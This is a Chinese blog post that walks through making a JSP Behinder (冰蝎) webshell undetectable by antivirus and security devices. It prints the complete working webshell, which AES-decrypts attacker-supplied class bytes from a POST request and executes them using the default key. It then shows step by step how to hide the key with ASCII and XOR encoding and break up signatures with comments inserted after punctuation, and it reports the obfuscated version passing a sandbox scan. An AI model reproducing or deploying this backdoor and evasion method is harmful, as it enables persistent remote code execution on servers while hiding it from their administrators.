Webshell免杀-JSP

最新推荐文章于 2024-04-27 08:01:34 发布
最新推荐文章于 2024-04-27 08:01:34 发布
阅读量2.7k 收藏 2
点赞数 2
分类专栏: 免杀 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55787787/article/details/127331670
版权

前言

        在很多渗透测试利用的过程中,渗透人员会通过上传webshell的方式来获取目标服务器的权限。然而及时webshell文件能够正常上传,后续有可能会被管理员当作木马文件删除,上传的过程中也会被安全设备拦截,因此对webshell文件进行免杀操作是不可或缺的。本处仅对jsp类型的webshell文件进行一个冰蝎马免杀思路的介绍。

思路

        在对webshell文件进行免杀操作之前首先得明白,有哪些操作能够使得webshell文件具有免杀的属性。


1、增加注释
2、增加不重要的代码段
3、对代码进行混肴加密
4、对代码进行拆分重组
5、增加反射
……………………

        免杀方式千千万,总有一款适合你。简而言之,搞到最后,自己都读不懂自己的代码的时候,恭喜你,免杀了!

        本篇文章仅对冰蝎马的免杀方式做一个简单的介绍,主要是介绍免杀jsp马子时候的思路实现。

测试

        首先看一个常规的jsp的冰蝎马的代码。

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

        其在一行里面将整个代码都写了出来,那是相当的乱啊。不过,先看看他的免杀性如何?

        对于这个结果也是意料之中,情理之中的了。

        咱们先对冰蝎马进行一个格式化的操作,有便于去理解修改,顺手把里面的注释也给删掉。

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }
    public Class g(byte []b){
        return super.defineClass(b,0,b.length);
    }
}%>
<%if (request.getMethod().equals("POST")){
    String k="e45e329feb5d925b";
    session.putValue("u",k);
    Cipher c=Cipher.getInstance("AES");
    c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}%>

         直观的看上去,哪儿最好搞捏?当然是k这里呀!

        我们把k里面的数值用ascall码一个一个对照输出出来,虽然完成的结果是一样的,但是多少能够限制杀软理解马子的步伐的吧。

        那么问题来了,“e45e329feb5d925b”的ascall值是多少?掰开对照表一个一个看?不可能,绝对不可能,能用代码解决的问题,绝对不可能动手!

        这里是一个python的转换代码

s = 'e45e329feb5d925b'
a = []
for i in s:
    a.append(ord(i))
print(a)

        输出结果为

[101, 52, 53, 101, 51, 50, 57, 102, 101, 98, 53, 100, 57, 50, 53, 98]

        那么现在就可以把k的部分改成

String k="";
int[] ee=new int[]{101, 52, 53, 101, 51, 50, 57, 102, 101, 98, 53, 100, 57, 50, 53, 98}
for (int i=0;i < ee.length;i++) {
        k=k+ (char) ee[i];
}

        经过这样一个转换之后,k的值就会等于“e45e329feb5d925b“,那么这样就OK了嘛?NONONO!

        既然都已经转换成ascall码了,那就再做个异或的操作吧。

        python的异或代码

s = 'e45e329feb5d925b'
a = []
for i in s:
    a.append(ord(i))
for i in range(0, len(a)):
    a[i] = a[i] ^ 0x010
print(a)

        输出结果为

[117, 36, 37, 117, 35, 34, 41, 118, 117, 114, 37, 116, 41, 34, 37, 114]

        那么现在就可以把k的部分改成

String k="";
int[] ee=new int[]{117, 36, 37, 117, 35, 34, 41, 118, 117, 114, 37, 116, 41, 34, 37, 114}
for (int i=0;i < ee.length;i++) {
        ee[i]=ee[i] ^ 0x010;
        k=k+ (char) ee[i];
}

        这么一通操作下来,你以为就能免杀了嘛?免杀哪有那么轻松。

        不过可以祭出终极杀招,百试百灵---加注释。

        这个加注释可不是加一条两条就可以的,也不是随便加都行的。经过测试,必须加在标点符号之后,于是乎在所有.和,之间都加上注释,代码变成了

<%@page import="java./*YDjdiejmPL*/util./*YDjdiejmPL*/*,/*ksafjKJOIldk*/javax./*YDjdiejmPL*/crypto./*YDjdiejmPL*/*,/*ksafjKJOIldk*/javax./*YDjdiejmPL*/crypto./*YDjdiejmPL*/spec./*YDjdiejmPL*/*"%>
<%!class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }
    public Class g(byte []b){
        return super./*YDjdiejmPL*/defineClass(b,/*ksafjKJOIldk*/0,/*ksafjKJOIldk*/b./*YDjdiejmPL*/length);
    }
}%>
<%if (request./*YDjdiejmPL*/getMethod()./*YDjdiejmPL*/equals("POST")){
    String k="";
    int[] ee=new int[]{117,/*ksafjKJOIldk*/ 36,/*ksafjKJOIldk*/ 37,/*ksafjKJOIldk*/ 117,/*ksafjKJOIldk*/ 35,/*ksafjKJOIldk*/ 34,/*ksafjKJOIldk*/ 41,/*ksafjKJOIldk*/ 118,/*ksafjKJOIldk*/ 117,/*ksafjKJOIldk*/ 114,/*ksafjKJOIldk*/ 37,/*ksafjKJOIldk*/ 116,/*ksafjKJOIldk*/ 41,/*ksafjKJOIldk*/ 34,/*ksafjKJOIldk*/ 37,/*ksafjKJOIldk*/ 114}
    for (int i=0;i < ee./*YDjdiejmPL*/length;i++) {
        ee[i]=ee[i] ^ 0x010;
        k=k+ (char) ee[i];
    }
    session./*YDjdiejmPL*/putValue("u",/*ksafjKJOIldk*/k);
    Cipher c=Cipher./*YDjdiejmPL*/getInstance("AES");
    c./*YDjdiejmPL*/init(2,/*ksafjKJOIldk*/new SecretKeySpec(k./*YDjdiejmPL*/getBytes(),/*ksafjKJOIldk*/"AES"));
    new U(this./*YDjdiejmPL*/getClass()./*YDjdiejmPL*/getClassLoader())./*YDjdiejmPL*/g(c./*YDjdiejmPL*/doFinal(new sun./*YDjdiejmPL*/misc./*YDjdiejmPL*/BASE64Decoder()./*YDjdiejmPL*/decodeBuffer(request./*YDjdiejmPL*/getReader()./*YDjdiejmPL*/readLine())))./*YDjdiejmPL*/newInstance()./*YDjdiejmPL*/equals(pageContext);
}%>

         现在再看看捏?

        没有一丝丝的防备~!就免杀了。 

        附一张之前跑的沙箱结果

        jsp的免杀里面还可以加上反射,然后再加上异或之类的操作就更好了。不过弟弟反射没学好,这边就不献丑了。

 END

小mos
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
jsp webshell 初识
weixin_50217210的博客
03-02 372
访问得到os.name的信息 代码中可以接收参数cmd 我们提供参数看看 cmd=ipconfig。没问题这里(只是我测试的时候没有处理图片,就不放置了)很有可能是字节输出的代码被检测到了,我们删除了看一下。果然,删除以后检测不到了,那我们想办法绕过。之前是执行exec参数,这次是可疑文件。放到IDEA中webapp下测试一下。在D盾跑还是被检测到了,换一种方式输出字节流。
JSP webshell免杀——webshell免杀
weixin_46601374的博客
06-29 3327
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习免杀首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
webshelljsp免杀
tomyyyyy
11-26 2394
webshelljsp免杀 转载自webshell免杀研究 原理 向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构 实现三步 数据的传递 执行所传递的数据 回显 数据传递 String x = request.getParameter("x"); 执行所传递的数据 Class rt = Class.forN...
Javaweb安全——JSP Webshell
weixin_43610673的博客
08-22 5295
public static class x extends ClassLoader //继承ClassLoader {#恶意类字节码 BASE64Decoder code = new sun . misc . BASE64Decoder();//将base64解码成byte数组,并传入自定义类的get函数 System . out . println(result . newInstance());}.
轻松玩转WEB安全
02-08
本课程会介绍web安全基础知识,通过实际操作解释技术原理,巩固学习成果。模拟多种实战场景,结合技术讲解,传授对抗WAF的经验,定制自己的免杀webshell,带你深刻理解不同实战下的渗透思路。对技术要点进行总结,并且介绍自己的奇淫技巧,发现新的漏洞挖掘技术方向,帮助各位同学高效挖洞获取奖金。
Webshell免杀-PHP
qq_55787787的博客
10-13 1893
万能的PHP的webshell免杀方式。
JSP免杀
hackzkaq的博客
10-20 403
针对PHP马可通过监测核心的eval函数进行查杀,但是JSP马的查杀目前还没有很好的监测办法,除上述的利用进行免杀外,还可通过创建Runtime的父类等方式。笔者水平有限,欢迎大家指出问题。`m 9`竟然是敏感词,我把文中的换成了@@@,大家自行替换即可。原文地址:https://www.freebuf.com/articles/web/355975.html。
过d盾 jsp webshell+冰蝎免杀马探讨
goddemon
07-19 2230
jsp免杀马的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。
JavaWeb后门(webshell)基础
st3pby的博客
12-25 1199
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言,语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
webshell-dictionary-master 上千个webshell合集
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
webshell-venom-master一些免杀
04-13
webshell-venom-master一些免杀马,各种语言
强大的webshell管理工具-哥斯拉
12-27
只有适合自己的工具,没有好坏之分,拿走不谢。
php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM
03-11
WebShell攻击PHP-FPM来自大佬的文末一个想法快速实现了一个poc,可以实现任意代码执行后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的使用...
Webshell免杀教程
02-03
Webshell免杀教程,精华浓缩版,详细介绍Webshell这个目前很流行的技术
【网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 714
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全思考题
最新发布
weixin_62304542的博客
04-27 767
网络安全渗透思考题
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1032
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
webshell免杀
03-16
WebShell 免杀指的是让 WebShell 在网站管理员或安全软件扫描时不被检测到或误判为恶意软件。这可以通过混淆、加密或隐藏 WebShell 的代码来实现。但是需要注意的是,这并不能保证 WebShell 不会被发现或清除,并且...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值